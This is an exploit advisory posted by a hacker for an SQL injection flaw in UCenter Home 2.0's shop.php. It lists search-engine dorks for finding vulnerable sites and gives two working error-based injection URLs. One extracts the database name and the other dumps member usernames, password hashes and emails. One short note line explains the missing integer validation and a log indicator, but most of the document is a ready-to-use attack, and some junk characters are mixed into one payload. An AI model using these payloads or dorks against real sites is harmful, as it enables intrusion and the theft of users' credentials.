__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Note : the requests below append SQL directly after the numeric shopid value, so the parameter evidently reaches the query without an integer cast or parameter binding. Validating shopid as an integer in shop.php addresses the root cause; in web logs, a shopid value containing anything other than digits is the indicator.
Needed Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Your Need victim Database name.
) b$ z( b- ^( G h" {- k: F7 hfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 8 a4 Y: b! ~; M4 B
..
DB : Okey.
your edit DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
Your use Hex conversion. And edit Your SQL Injection Exploit..
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1